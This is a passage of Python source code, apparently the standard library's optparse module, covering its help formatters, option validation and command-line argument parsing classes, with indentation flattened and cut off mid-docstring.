width = int(os.environ['COLUMNS'])
except (KeyError, ValueError):
width = 80
width -= 2
self.width = width
self.current_indent = 0
self.level = 0
self.help_width = None # computed later
self.short_first = short_first
self.default_tag = "%default"
self.option_strings = {}
self._short_opt_fmt = "%s %s"
self._long_opt_fmt = "%s=%s"
def set_parser(self, parser):
self.parser = parser
def set_short_opt_delimiter(self, delim):
if delim not in ("", " "):
raise ValueError(
"invalid metavar delimiter for short options: %r" % delim)
self._short_opt_fmt = "%s" + delim + "%s"
def set_long_opt_delimiter(self, delim):
if delim not in ("=", " "):
raise ValueError(
"invalid metavar delimiter for long options: %r" % delim)
self._long_opt_fmt = "%s" + delim + "%s"
def indent(self):
self.current_indent += self.indent_increment
self.level += 1
def dedent(self):
self.current_indent -= self.indent_increment
assert self.current_indent >= 0, "Indent decreased below 0."
self.level -= 1
def format_usage(self, usage):
raise NotImplementedError("subclasses must implement")
def format_heading(self, heading):
raise NotImplementedError("subclasses must implement")
def _format_text(self, text):
"""
Format a paragraph of free-form text for inclusion in the
help output at the current indentation level.
"""
text_width = self.width - self.current_indent
indent = " "*self.current_indent
return textwrap.fill(text,
text_width,
initial_indent=indent,
subsequent_indent=indent)
def format_description(self, description):
if description:
return self._format_text(description) + "\n"
else:
return ""
def format_epilog(self, epilog):
if epilog:
return "\n" + self._format_text(epilog) + "\n"
else:
return ""
def expand_default(self, option):
if self.parser is None or not self.default_tag:
return option.help
default_value = self.parser.defaults.get(option.dest)
if default_value is NO_DEFAULT or default_value is None:
default_value = self.NO_DEFAULT_VALUE
return option.help.replace(self.default_tag, str(default_value))
def format_option(self, option):
# The help for each option consists of two parts:
# * the opt strings and metavars
# eg. ("-x", or "-fFILENAME, --file=FILENAME")
# * the user-supplied help string
# eg. ("turn on expert mode", "read data from FILENAME")
#
# If possible, we write both of these on the same line:
# -x turn on expert mode
#
# But if the opt string list is too long, we put the help
# string on a second line, indented to the same column it would
# start in if it fit on the first line.
# -fFILENAME, --file=FILENAME
# read data from FILENAME
result = []
opts = self.option_strings[option]
opt_width = self.help_position - self.current_indent - 2
if len(opts) > opt_width:
opts = "%*s%s\n" % (self.current_indent, "", opts)
indent_first = self.help_position
else: # start help on same line as opts
opts = "%*s%-*s " % (self.current_indent, "", opt_width, opts)
indent_first = 0
result.append(opts)
if option.help:
help_text = self.expand_default(option)
help_lines = textwrap.wrap(help_text, self.help_width)
result.append("%*s%s\n" % (indent_first, "", help_lines[0]))
result.extend(["%*s%s\n" % (self.help_position, "", line)
for line in help_lines[1:]])
elif opts[-1] != "\n":
result.append("\n")
return "".join(result)
def store_option_strings(self, parser):
self.indent()
max_len = 0
for opt in parser.option_list:
strings = self.format_option_strings(opt)
self.option_strings[opt] = strings
max_len = max(max_len, len(strings) + self.current_indent)
self.indent()
for group in parser.option_groups:
for opt in group.option_list:
strings = self.format_option_strings(opt)
self.option_strings[opt] = strings
max_len = max(max_len, len(strings) + self.current_indent)
self.dedent()
self.dedent()
self.help_position = min(max_len + 2, self.max_help_position)
self.help_width = self.width - self.help_position
def format_option_strings(self, option):
"""Return a comma-separated list of option strings & metavariables."""
if option.takes_value():
metavar = option.metavar or option.dest.upper()
short_opts = [self._short_opt_fmt % (sopt, metavar)
for sopt in option._short_opts]
long_opts = [self._long_opt_fmt % (lopt, metavar)
for lopt in option._long_opts]
else:
short_opts = option._short_opts
long_opts = option._long_opts
if self.short_first:
opts = short_opts + long_opts
else:
opts = long_opts + short_opts
return ", ".join(opts)
class IndentedHelpFormatter (HelpFormatter):
"""Format help with indented section bodies.
"""
def __init__(self,
indent_increment=2,
max_help_position=24,
width=None,
short_first=1):
HelpFormatter.__init__(
self, indent_increment, max_help_position, width, short_first)
def format_usage(self, usage):
return _("Usage: %s\n") % usage
def format_heading(self, heading):
return "%*s%s:\n" % (self.current_indent, "", heading)
class TitledHelpFormatter (HelpFormatter):
"""Format help with underlined section headers.
"""
def __init__(self,
indent_increment=0,
max_help_position=24,
width=None,
short_first=0):
HelpFormatter.__init__ (
self, indent_increment, max_help_position, width, short_first)
def format_usage(self, usage):
return "%s %s\n" % (self.format_heading(_("Usage")), usage)
def format_heading(self, heading):
return "%s\n%s\n" % (heading, "=-"[self.level] * len(heading))
def _parse_num(val, type):
if val[:2].lower() == "0x": # hexadecimal
radix = 16
elif val[:2].lower() == "0b": # binary
radix = 2
val = val[2:] or "0" # have to remove "0b" prefix
elif val[:1] == "0": # octal
radix = 8
else: # decimal
radix = 10
return type(val, radix)
def _parse_int(val):
return _parse_num(val, int)
_builtin_cvt = { "int" : (_parse_int, _("integer")),
"long" : (_parse_int, _("integer")),
"float" : (float, _("floating-point")),
"complex" : (complex, _("complex")) }
def check_builtin(option, opt, value):
(cvt, what) = _builtin_cvt[option.type]
try:
return cvt(value)
except ValueError:
raise OptionValueError(
_("option %s: invalid %s value: %r") % (opt, what, value))
def check_choice(option, opt, value):
if value in option.choices:
return value
else:
choices = ", ".join(map(repr, option.choices))
raise OptionValueError(
_("option %s: invalid choice: %r (choose from %s)")
% (opt, value, choices))
# Not supplying a default is different from a default of None,
# so we need an explicit "not supplied" value.
NO_DEFAULT = ("NO", "DEFAULT")
class Option:
"""
Instance attributes:
_short_opts : [string]
_long_opts : [string]
action : string
type : string
dest : string
default : any
nargs : int
const : any
choices : [string]
callback : function
callback_args : (any*)
callback_kwargs : { string : any }
help : string
metavar : string
"""
# The list of instance attributes that may be set through
# keyword args to the constructor.
ATTRS = ['action',
'type',
'dest',
'default',
'nargs',
'const',
'choices',
'callback',
'callback_args',
'callback_kwargs',
'help',
'metavar']
# The set of actions allowed by option parsers. Explicitly listed
# here so the constructor can validate its arguments.
ACTIONS = ("store",
"store_const",
"store_true",
"store_false",
"append",
"append_const",
"count",
"callback",
"help",
"version")
# The set of actions that involve storing a value somewhere;
# also listed just for constructor argument validation. (If
# the action is one of these, there must be a destination.)
STORE_ACTIONS = ("store",
"store_const",
"store_true",
"store_false",
"append",
"append_const",
"count")
# The set of actions for which it makes sense to supply a value
# type, ie. which may consume an argument from the command line.
TYPED_ACTIONS = ("store",
"append",
"callback")
# The set of actions which *require* a value type, ie. that
# always consume an argument from the command line.
ALWAYS_TYPED_ACTIONS = ("store",
"append")
# The set of actions which take a 'const' attribute.
CONST_ACTIONS = ("store_const",
"append_const")
# The set of known types for option parsers. Again, listed here for
# constructor argument validation.
TYPES = ("string", "int", "long", "float", "complex", "choice")
# Dictionary of argument checking functions, which convert and
# validate option arguments according to the option type.
#
# Signature of checking functions is:
# check(option : Option, opt : string, value : string) -> any
# where
# option is the Option instance calling the checker
# opt is the actual option seen on the command-line
# (eg. "-a", "--file")
# value is the option argument seen on the command-line
#
# The return value should be in the appropriate Python type
# for option.type -- eg. an integer if option.type == "int".
#
# If no checker is defined for a type, arguments will be
# unchecked and remain strings.
TYPE_CHECKER = { "int" : check_builtin,
"long" : check_builtin,
"float" : check_builtin,
"complex": check_builtin,
"choice" : check_choice,
}
# CHECK_METHODS is a list of unbound method objects; they are called
# by the constructor, in order, after all attributes are
# initialized. The list is created and filled in later, after all
# the methods are actually defined. (I just put it here because I
# like to define and document all class attributes in the same
# place.) Subclasses that add another _check_*() method should
# define their own CHECK_METHODS list that adds their check method
# to those from this class.
CHECK_METHODS = None
# -- Constructor/initialization methods ----------------------------
def __init__(self, *opts, **attrs):
# Set _short_opts, _long_opts attrs from 'opts' tuple.
# Have to be set now, in case no option strings are supplied.
self._short_opts = []
self._long_opts = []
opts = self._check_opt_strings(opts)
self._set_opt_strings(opts)
# Set all other attrs (action, type, etc.) from 'attrs' dict
self._set_attrs(attrs)
# Check all the attributes we just set. There are lots of
# complicated interdependencies, but luckily they can be farmed
# out to the _check_*() methods listed in CHECK_METHODS -- which
# could be handy for subclasses! The one thing these all share
# is that they raise OptionError if they discover a problem.
for checker in self.CHECK_METHODS:
checker(self)
def _check_opt_strings(self, opts):
# Filter out None because early versions of Optik had exactly
# one short option and one long option, either of which
# could be None.
opts = [opt for opt in opts if opt]
if not opts:
raise TypeError("at least one option string must be supplied")
return opts
def _set_opt_strings(self, opts):
for opt in opts:
if len(opt) < 2:
raise OptionError(
"invalid option string %r: "
"must be at least two characters long" % opt, self)
elif len(opt) == 2:
if not (opt[0] == "-" and opt[1] != "-"):
raise OptionError(
"invalid short option string %r: "
"must be of the form -x, (x any non-dash char)" % opt,
self)
self._short_opts.append(opt)
else:
if not (opt[0:2] == "--" and opt[2] != "-"):
raise OptionError(
"invalid long option string %r: "
"must start with --, followed by non-dash" % opt,
self)
self._long_opts.append(opt)
def _set_attrs(self, attrs):
for attr in self.ATTRS:
if attr in attrs:
setattr(self, attr, attrs[attr])
del attrs[attr]
else:
if attr == 'default':
setattr(self, attr, NO_DEFAULT)
else:
setattr(self, attr, None)
if attrs:
attrs = sorted(attrs.keys())
raise OptionError(
"invalid keyword arguments: %s" % ", ".join(attrs),
self)
# -- Constructor validation methods --------------------------------
def _check_action(self):
if self.action is None:
self.action = "store"
elif self.action not in self.ACTIONS:
raise OptionError("invalid action: %r" % self.action, self)
def _check_type(self):
if self.type is None:
if self.action in self.ALWAYS_TYPED_ACTIONS:
if self.choices is not None:
# The "choices" attribute implies "choice" type.
self.type = "choice"
else:
# No type given? "string" is the most sensible default.
self.type = "string"
else:
# Allow type objects or builtin type conversion functions
# (int, str, etc.) as an alternative to their names. (The
# complicated check of builtins is only necessary for
# Python 2.1 and earlier, and is short-circuited by the
# first check on modern Pythons.)
import builtins
if ( isinstance(self.type, type) or
(hasattr(self.type, "__name__") and
getattr(builtins, self.type.__name__, None) is self.type) ):
self.type = self.type.__name__
if self.type == "str":
self.type = "string"
if self.type not in self.TYPES:
raise OptionError("invalid option type: %r" % self.type, self)
if self.action not in self.TYPED_ACTIONS:
raise OptionError(
"must not supply a type for action %r" % self.action, self)
def _check_choice(self):
if self.type == "choice":
if self.choices is None:
raise OptionError(
"must supply a list of choices for type 'choice'", self)
elif not isinstance(self.choices, (tuple, list)):
raise OptionError(
"choices must be a list of strings ('%s' supplied)"
% str(type(self.choices)).split("'")[1], self)
elif self.choices is not None:
raise OptionError(
"must not supply choices for type %r" % self.type, self)
def _check_dest(self):
# No destination given, and we need one for this action. The
# self.type check is for callbacks that take a value.
takes_value = (self.action in self.STORE_ACTIONS or
self.type is not None)
if self.dest is None and takes_value:
# Glean a destination from the first long option string,
# or from the first short option string if no long options.
if self._long_opts:
# eg. "--foo-bar" -> "foo_bar"
self.dest = self._long_opts[0][2:].replace('-', '_')
else:
self.dest = self._short_opts[0][1]
def _check_const(self):
if self.action not in self.CONST_ACTIONS and self.const is not None:
raise OptionError(
"'const' must not be supplied for action %r" % self.action,
self)
def _check_nargs(self):
if self.action in self.TYPED_ACTIONS:
if self.nargs is None:
self.nargs = 1
elif self.nargs is not None:
raise OptionError(
"'nargs' must not be supplied for action %r" % self.action,
self)
def _check_callback(self):
if self.action == "callback":
if not callable(self.callback):
raise OptionError(
"callback not callable: %r" % self.callback, self)
if (self.callback_args is not None and
not isinstance(self.callback_args, tuple)):
raise OptionError(
"callback_args, if supplied, must be a tuple: not %r"
% self.callback_args, self)
if (self.callback_kwargs is not None and
not isinstance(self.callback_kwargs, dict)):
raise OptionError(
"callback_kwargs, if supplied, must be a dict: not %r"
% self.callback_kwargs, self)
else:
if self.callback is not None:
raise OptionError(
"callback supplied (%r) for non-callback option"
% self.callback, self)
if self.callback_args is not None:
raise OptionError(
"callback_args supplied for non-callback option", self)
if self.callback_kwargs is not None:
raise OptionError(
"callback_kwargs supplied for non-callback option", self)
CHECK_METHODS = [_check_action,
_check_type,
_check_choice,
_check_dest,
_check_const,
_check_nargs,
_check_callback]
# -- Miscellaneous methods -----------------------------------------
def __str__(self):
return "/".join(self._short_opts + self._long_opts)
__repr__ = _repr
def takes_value(self):
return self.type is not None
def get_opt_string(self):
if self._long_opts:
return self._long_opts[0]
else:
return self._short_opts[0]
# -- Processing methods --------------------------------------------
def check_value(self, opt, value):
checker = self.TYPE_CHECKER.get(self.type)
if checker is None:
return value
else:
return checker(self, opt, value)
def convert_value(self, opt, value):
if value is not None:
if self.nargs == 1:
return self.check_value(opt, value)
else:
return tuple([self.check_value(opt, v) for v in value])
def process(self, opt, value, values, parser):
# First, convert the value(s) to the right type. Howl if any
# value(s) are bogus.
value = self.convert_value(opt, value)
# And then take whatever action is expected of us.
# This is a separate method to make life easier for
# subclasses to add new actions.
return self.take_action(
self.action, self.dest, opt, value, values, parser)
def take_action(self, action, dest, opt, value, values, parser):
if action == "store":
setattr(values, dest, value)
elif action == "store_const":
setattr(values, dest, self.const)
elif action == "store_true":
setattr(values, dest, True)
elif action == "store_false":
setattr(values, dest, False)
elif action == "append":
values.ensure_value(dest, []).append(value)
elif action == "append_const":
values.ensure_value(dest, []).append(self.const)
elif action == "count":
setattr(values, dest, values.ensure_value(dest, 0) + 1)
elif action == "callback":
args = self.callback_args or ()
kwargs = self.callback_kwargs or {}
self.callback(self, opt, value, parser, *args, **kwargs)
elif action == "help":
parser.print_help()
parser.exit()
elif action == "version":
parser.print_version()
parser.exit()
else:
raise ValueError("unknown action %r" % self.action)
return 1
# class Option
SUPPRESS_HELP = "SUPPRESS"+"HELP"
SUPPRESS_USAGE = "SUPPRESS"+"USAGE"
class Values:
def __init__(self, defaults=None):
if defaults:
for (attr, val) in defaults.items():
setattr(self, attr, val)
def __str__(self):
return str(self.__dict__)
__repr__ = _repr
def __eq__(self, other):
if isinstance(other, Values):
return self.__dict__ == other.__dict__
elif isinstance(other, dict):
return self.__dict__ == other
else:
return NotImplemented
def _update_careful(self, dict):
"""
Update the option values from an arbitrary dictionary, but only
use keys from dict that already have a corresponding attribute
in self. Any keys in dict without a corresponding attribute
are silently ignored.
"""
for attr in dir(self):
if attr in dict:
dval = dict[attr]
if dval is not None:
setattr(self, attr, dval)
def _update_loose(self, dict):
"""
Update the option values from an arbitrary dictionary,
using all keys from the dictionary regardless of whether
they have a corresponding attribute in self or not.
"""
self.__dict__.update(dict)
def _update(self, dict, mode):
if mode == "careful":
self._update_careful(dict)
elif mode == "loose":
self._update_loose(dict)
else:
raise ValueError("invalid update mode: %r" % mode)
def read_module(self, modname, mode="careful"):
__import__(modname)
mod = sys.modules[modname]
self._update(vars(mod), mode)
def read_file(self, filename, mode="careful"):
vars = {}
exec(open(filename).read(), vars)
self._update(vars, mode)
def ensure_value(self, attr, value):
if not hasattr(self, attr) or getattr(self, attr) is None:
setattr(self, attr, value)
return getattr(self, attr)
class OptionContainer:
"""
Abstract base class.
Class attributes:
standard_option_list : [Option]
list of standard options that will be accepted by all instances
of this parser class (intended to be overridden by subclasses).
Instance attributes:
option_list : [Option]
the list of Option objects contained by this OptionContainer
_short_opt : { string : Option }
dictionary mapping short option strings, eg. "-f" or "-X",
to the Option instances that implement them. If an Option
has multiple short option strings, it will appears in this
dictionary multiple times. [1]
_long_opt : { string : Option }
dictionary mapping long option strings, eg. "--file" or
"--exclude", to the Option instances that implement them.
Again, a given Option can occur multiple times in this
dictionary. [1]
defaults : { string : any }
dictionary mapping option destination names to default
values for each destination [1]
[1] These mappings are common to (shared by) all components of the
controlling OptionParser, where they are initially created.
"""
def __init__(self, option_class, conflict_handler, description):
# Initialize the option list and related data structures.
# This method must be provided by subclasses, and it must
# initialize at least the following instance attributes:
# option_list, _short_opt, _long_opt, defaults.
self._create_option_list()
self.option_class = option_class
self.set_conflict_handler(conflict_handler)
self.set_description(description)
def _create_option_mappings(self):
# For use by OptionParser constructor -- create the master
# option mappings used by this OptionParser and all
# OptionGroups that it owns.
self._short_opt = {} # single letter -> Option instance
self._long_opt = {} # long option -> Option instance
self.defaults = {} # maps option dest -> default value
def _share_option_mappings(self, parser):
# For use by OptionGroup constructor -- use shared option
# mappings from the OptionParser that owns this OptionGroup.
self._short_opt = parser._short_opt
self._long_opt = parser._long_opt
self.defaults = parser.defaults
def set_conflict_handler(self, handler):
if handler not in ("error", "resolve"):
raise ValueError("invalid conflict_resolution value %r" % handler)
self.conflict_handler = handler
def set_description(self, description):
self.description = description
def get_description(self):
return self.description
def destroy(self):
"""see OptionParser.destroy()."""
del self._short_opt
del self._long_opt
del self.defaults
# -- Option-adding methods -----------------------------------------
def _check_conflict(self, option):
conflict_opts = []
for opt in option._short_opts:
if opt in self._short_opt:
conflict_opts.append((opt, self._short_opt[opt]))
for opt in option._long_opts:
if opt in self._long_opt:
conflict_opts.append((opt, self._long_opt[opt]))
if conflict_opts:
handler = self.conflict_handler
if handler == "error":
raise OptionConflictError(
"conflicting option string(s): %s"
% ", ".join([co[0] for co in conflict_opts]),
option)
elif handler == "resolve":
for (opt, c_option) in conflict_opts:
if opt.startswith("--"):
c_option._long_opts.remove(opt)
del self._long_opt[opt]
else:
c_option._short_opts.remove(opt)
del self._short_opt[opt]
if not (c_option._short_opts or c_option._long_opts):
c_option.container.option_list.remove(c_option)
def add_option(self, *args, **kwargs):
"""add_option(Option)
add_option(opt_str, ..., kwarg=val, ...)
"""
if isinstance(args[0], str):
option = self.option_class(*args, **kwargs)
elif len(args) == 1 and not kwargs:
option = args[0]
if not isinstance(option, Option):
raise TypeError("not an Option instance: %r" % option)
else:
raise TypeError("invalid arguments")
self._check_conflict(option)
self.option_list.append(option)
option.container = self
for opt in option._short_opts:
self._short_opt[opt] = option
for opt in option._long_opts:
self._long_opt[opt] = option
if option.dest is not None: # option has a dest, we need a default
if option.default is not NO_DEFAULT:
self.defaults[option.dest] = option.default
elif option.dest not in self.defaults:
self.defaults[option.dest] = None
return option
def add_options(self, option_list):
for option in option_list:
self.add_option(option)
# -- Option query/removal methods ----------------------------------
def get_option(self, opt_str):
return (self._short_opt.get(opt_str) or
self._long_opt.get(opt_str))
def has_option(self, opt_str):
return (opt_str in self._short_opt or
opt_str in self._long_opt)
def remove_option(self, opt_str):
option = self._short_opt.get(opt_str)
if option is None:
option = self._long_opt.get(opt_str)
if option is None:
raise ValueError("no such option %r" % opt_str)
for opt in option._short_opts:
del self._short_opt[opt]
for opt in option._long_opts:
del self._long_opt[opt]
option.container.option_list.remove(option)
# -- Help-formatting methods ---------------------------------------
def format_option_help(self, formatter):
if not self.option_list:
return ""
result = []
for option in self.option_list:
if not option.help is SUPPRESS_HELP:
result.append(formatter.format_option(option))
return "".join(result)
def format_description(self, formatter):
return formatter.format_description(self.get_description())
def format_help(self, formatter):
result = []
if self.description:
result.append(self.format_description(formatter))
if self.option_list:
result.append(self.format_option_help(formatter))
return "\n".join(result)
class OptionGroup (OptionContainer):
def __init__(self, parser, title, description=None):
self.parser = parser
OptionContainer.__init__(
self, parser.option_class, parser.conflict_handler, description)
self.title = title
def _create_option_list(self):
self.option_list = []
self._share_option_mappings(self.parser)
def set_title(self, title):
self.title = title
def destroy(self):
"""see OptionParser.destroy()."""
OptionContainer.destroy(self)
del self.option_list
# -- Help-formatting methods ---------------------------------------
def format_help(self, formatter):
result = formatter.format_heading(self.title)
formatter.indent()
result += OptionContainer.format_help(self, formatter)
formatter.dedent()
return result
class OptionParser (OptionContainer):
"""
Class attributes:
standard_option_list : [Option]
list of standard options that will be accepted by all instances
of this parser class (intended to be overridden by subclasses).
Instance attributes:
usage : string
a usage string for your program. Before it is displayed
to the user, "%prog" will be expanded to the name of
your program (self.prog or os.path.basename(sys.argv[0])).
prog : string
the name of the current program (to override
os.path.basename(sys.argv[0])).
description : string
A paragraph of text giving a brief overview of your program.
optparse reformats this paragraph to fit the current terminal
width and prints it when the user requests help (after usage,
but before the list of options).
epilog : string
paragraph of help text to print after option help
option_groups : [OptionGroup]
list of option groups in this parser (option groups are
irrelevant for parsing the command-line, but very useful
for generating help)
allow_interspersed_args : bool = true
if true, positional arguments may be interspersed with options.
Assuming -a and -b each take a single argument, the command-line
-ablah foo bar -bboo baz
will be interpreted the same as
-ablah -bboo -- foo bar baz
If this flag were false, that command line would be interpreted as
-ablah -- foo bar -bboo baz
-- ie. we stop processing options as soon as we see the first
non-option argument. (This is the tradition followed by
Python's getopt module, Perl's Getopt::Std, and other argument-
parsing libraries, but it is generally annoying to users.)
process_default_values : bool = true
if true, option default values are processed similarly to option
values from the command line: that is, they are passed to the
type-checking function for the option's type (as long as the
default value is a string). (This really only matters if you
have defined custom types; see SF bug #955889.) Set it to false
to restore the behaviour of Optik 1.4.1 and earlier.
rargs : [string]
the argument list currently being parsed. Only set when
parse_args() is active, and continually trimmed down as
we consume arguments. Mainly there for the benefit of
callback options.
largs : [string]
the list of leftover arguments that we have skipped while
parsing options. If allow_interspersed_args is false, this
list is always empty.
values : Values
the set of option values currently being accumulated. Only
set when parse_args() is active. Also mainly for callbacks.
Because of the 'rargs', 'largs', and 'values' attributes,
OptionParser is not thread-safe. If, for some perverse reason, you
need to parse command-line arguments simultaneously in different
threads, use different OptionParser instances.
"""
standard_option_list = []
def __init__(self,
usage=None,
option_list=None,
option_class=Option,
version=None,
conflict_handler="error",
description=None,
formatter=None,
add_help_option=True,
prog=None,
epilog=None):
OptionContainer.__init__(
self, option_class, conflict_handler, description)
self.set_usage(usage)
self.prog = prog
self.version = version
self.allow_interspersed_args = True
self.process_default_values = True
if formatter is None:
formatter = IndentedHelpFormatter()
self.formatter = formatter
self.formatter.set_parser(self)
self.epilog = epilog
# Populate the option list; initial sources are the
# standard_option_list class attribute, the 'option_list'
# argument, and (if applicable) the _add_version_option() and
# _add_help_option() methods.
self._populate_option_list(option_list,
add_help=add_help_option)
self._init_parsing_state()
def destroy(self):
"""
Declare that you are done with this OptionParser. This cleans up
reference cycles so the OptionParser (and all objects referenced by
it) can be garbage-collected promptly. After calling destroy(), the
OptionParser is unusable.
"""
OptionContainer.destroy(self)
for group in self.option_groups:
group.destroy()
del self.option_list
del self.option_groups
del self.formatter
# -- Private methods -----------------------------------------------
# (used by our or OptionContainer's constructor)
def _create_option_list(self):
self.option_list = []
self.option_groups = []
self._create_option_mappings()
def _add_help_option(self):
self.add_option("-h", "--help",
action="help",
help=_("show this help message and exit"))
def _add_version_option(self):
self.add_option("--version",
action="version",
help=_("show program's version number and exit"))
def _populate_option_list(self, option_list, add_help=True):
if self.standard_option_list:
self.add_options(self.standard_option_list)
if option_list:
self.add_options(option_list)
if self.version:
self._add_version_option()
if add_help:
self._add_help_option()
def _init_parsing_state(self):
# These are set in parse_args() for the convenience of callbacks.
self.rargs = None
self.largs = None
self.values = None
# -- Simple modifier methods ---------------------------------------
def set_usage(self, usage):
if usage is None:
self.usage = _("%prog [options]")
elif usage is SUPPRESS_USAGE:
self.usage = None
# For backwards compatibility with Optik 1.3 and earlier.
elif usage.lower().startswith("usage: "):
self.usage = usage[7:]
else:
self.usage = usage
def enable_interspersed_args(self):
"""Set parsing to not stop on the first non-option, allowing
interspersing switches with command arguments. This is the
default behavior. See also disable_interspersed_args() and the
class documentation description of the attribute
allow_interspersed_args."""
self.allow_interspersed_args = True
def disable_interspersed_args(self):
"""Set parsing to stop on the first non-option. Use this if
you have a command processor which runs another command that
has options of its own and you want to make sure these options
don't get confused.
"""
self.allow_interspersed_args = False
def set_process_default_values(self, process):
self.process_default_values = process
def set_default(self, dest, value):
self.defaults[dest] = value
def set_defaults(self, **kwargs):
self.defaults.update(kwargs)
def _get_all_options(self):
options = self.option_list[:]
for group in self.option_groups:
options.extend(group.option_list)
return options
def get_default_values(self):
if not self.process_default_values:
# Old, pre-Optik 1.5 behaviour.
return Values(self.defaults)
defaults = self.defaults.copy()
for option in self._get_all_options():
default = defaults.get(option.dest)
if isinstance(default, str):
opt_str = option.get_opt_string()
defaults[option.dest] = option.check_value(opt_str, default)
return Values(defaults)
# -- OptionGroup methods -------------------------------------------
def add_option_group(self, *args, **kwargs):
# XXX lots of overlap with OptionContainer.add_option()
if isinstance(args[0], str):
group = OptionGroup(self, *args, **kwargs)
elif len(args) == 1 and not kwargs:
group = args[0]
if not isinstance(group, OptionGroup):
raise TypeError("not an OptionGroup instance: %r" % group)
if group.parser is not self:
raise ValueError("invalid OptionGroup (wrong parser)")
else:
raise TypeError("invalid arguments")
self.option_groups.append(group)
return group
def get_option_group(self, opt_str):
option = (self._short_opt.get(opt_str) or
self._long_opt.get(opt_str))
if option and option.container is not self:
return option.container
return None
# -- Option-parsing methods ----------------------------------------
def _get_args(self, args):
if args is None:
return sys.argv[1:]
else:
return args[:] # don't modify caller's list
def parse_args(self, args=None, values=None):
"""
parse_args(args : [string] = sys.argv[1:],
values : Values = None)
-> (values : Values, args : [string])
Parse the command-line options found in 'args' (default:
sys.argv[1:]). Any errors result in a call to 'error()', which
by default prints the usage message to stderr and calls
sys.exit() with an error message. On success returns a pair
(values, args) where 'values' is an Values instance (with all
your option values) and 'args' is the list of arguments left
over after parsing options.
"""
rargs = self._get_args(args)
if values is None:
values = self.get_default_values()
# Store the halves of the argument list as attributes for the
# convenience of callbacks:
# rargs
# the rest of the command-line (the "r" stands for
# "remaining" or "right-hand")
# largs
# the leftover arguments -- ie. what's left after removing
# options and their arguments (the "l" stands for "leftover"
# or "left-hand")
self.rargs = rargs
self.largs = largs = []
self.values = values
try:
stop = self._process_args(largs, rargs, values)
except (BadOptionError, OptionValueError) as err:
self.error(str(err))
args = largs + rargs
return self.check_values(values, args)
def check_values(self, values, args):
"""
check_values(values : Values, args : [string])
-> (values : Values, args : [string])
Check that the supplied option values and leftover arguments are
valid. Returns the option values and leftover arguments
(possibly adjusted, possibly completely new -- whatever you
like). Default implementation just returns the passed-in
values; subclasses may override as desired.
"""
return (values, args)
def _process_args(self, largs, rargs, values):
"""_process_args(largs : [string],
rargs : [string],
values : Values)
Process command-line arguments and populate 'values', consuming
options and arguments from 'rargs'. If 'allow_interspersed_args' is
false, stop at the first non-option argument. If true, accumulate any
interspersed non-option arguments in 'largs'.
"""
while rargs:
arg = rargs[0]
# We handle bare "--" explicitly, and bare "-" is handled by the
# standard arg handler since the short arg case ensures that the
# len of the opt string is greater than 1.
if arg == "--":
del rargs[0]
return
elif arg[0:2] == "--":
# process a single long option (possibly with value(s))
self._process_long_opt(rargs, values)
elif arg[:1] == "-" and len(arg) > 1:
# process a cluster of short options (possibly with
# value(s) for the last one only)
self._process_short_opts(rargs, values)
elif self.allow_interspersed_args:
largs.append(arg)
del rargs[0]
else:
return # stop now, leave this arg in rargs
# Say this is the original argument list:
# [arg0, arg1, ..., arg(i-1), arg(i), arg(i+1), ..., arg(N-1)]
# ^
# (we are about to process arg(i)).
#
# Then rargs is [arg(i), ..., arg(N-1)] and largs is a *subset* of
# [arg0, ..., arg(i-1)] (any options and their arguments will have
# been removed from largs).
#
# The while loop will usually consume 1 or more arguments per pass.
# If it consumes 1 (eg. arg is an option that takes no arguments),
# then after _process_arg() is done the situation is:
#
# largs = subset of [arg0, ..., arg(i)]
# rargs = [arg(i+1), ..., arg(N-1)]
#
# If allow_interspersed_args is false, largs will always be
# *empty* -- still a subset of [arg0, ..., arg(i-1)], but
# not a very interesting subset!
def _match_long_opt(self, opt):
"""_match_long_opt(opt : string) -> string
Determine which long option string 'opt' matches, ie. which one
it is an unambiguous abbreviation for. Raises BadOptionError if
'opt' doesn't unambiguously match any long option string.
"""
return _match_abbrev(opt, self._long_opt)
def _process_long_opt(self, rargs, values):
arg = rargs.pop(0)
# Value explicitly attached to arg? Pretend it's the next
# argument.
if "=" in arg:
(opt, next_arg) = arg.split("=", 1)
rargs.insert(0, next_arg)
had_explicit_value = True
else:
opt = arg
had_explicit_value = False
opt = self._match_long_opt(opt)
option = self._long_opt[opt]
if option.takes_value():
nargs = option.nargs
if len(rargs) < nargs:
self.error(ngettext(
"%(option)s option requires %(number)d argument",
"%(option)s option requires %(number)d arguments",
nargs) % {"option": opt, "number": nargs})
elif nargs == 1:
value = rargs.pop(0)
else:
value = tuple(rargs[0:nargs])
del rargs[0:nargs]
elif had_explicit_value:
self.error(_("%s option does not take a value") % opt)
else:
value = None
option.process(opt, value, values, self)
def _process_short_opts(self, rargs, values):
arg = rargs.pop(0)
stop = False
i = 1
for ch in arg[1:]:
opt = "-" + ch
option = self._short_opt.get(opt)
i += 1 # we have consumed a character
if not option:
raise BadOptionError(opt)
if option.takes_value():
# Any characters left in arg? Pretend they're the
# next arg, and stop consuming characters of arg.
if i < len(arg):
rargs.insert(0, arg[i:])
stop = True
nargs = option.nargs
if len(rargs) < nargs:
self.error(ngettext(
"%(option)s option requires %(number)d argument",
"%(option)s option requires %(number)d arguments",
nargs) % {"option": opt, "number": nargs})
elif nargs == 1:
value = rargs.pop(0)
else:
value = tuple(rargs[0:nargs])
del rargs[0:nargs]
else: # option doesn't take a value
value = None
option.process(opt, value, values, self)
if stop:
break
# -- Feedback methods ----------------------------------------------
def get_prog_name(self):
if self.prog is None:
return os.path.basename(sys.argv[0])
else:
return self.prog
def expand_prog_name(self, s):
return s.replace("%prog", self.get_prog_name())
def get_description(self):
return self.expand_prog_name(self.description)
def exit(self, status=0, msg=None):
if msg:
sys.stderr.write(msg)
sys.exit(status)
def error(self, msg):
"""error(msg : string)
Print a usage message incorporating 'msg' to stderr and exit.
If you override this in a subclass, it should not return -- it
should either exit or raise an exception.
"""
self.print_usage(sys.stderr)
self.exit(2, "%s: error: %s\n" % (self.get_prog_name(), msg))
def get_usage(self):
if self.usage:
return self.formatter.format_usage(
self.expand_prog_name(self.usage))
else:
return ""
def print_usage(self, file=None):
"""print_usage(file : file = stdout)
Print the usage message for the current program (self.usage) to
'file' (default stdout). Any occurrence of the string "%prog" in
self.usage is replaced with the name of the current program
(basename of sys.argv[0]). Does nothing if self.usage is empty
or not defined.
"""
if self.usage:
print(self.get_usage(), file=file)
def get_version(self):
if self.version:
return self.expand_prog_name(self.version)
else:
return ""
def print_version(self, file=None):
"""print_version(file : file = stdout)
Print the version message for this program (self.version) to
'file' (default stdout). As with print_usage(), any occurrence
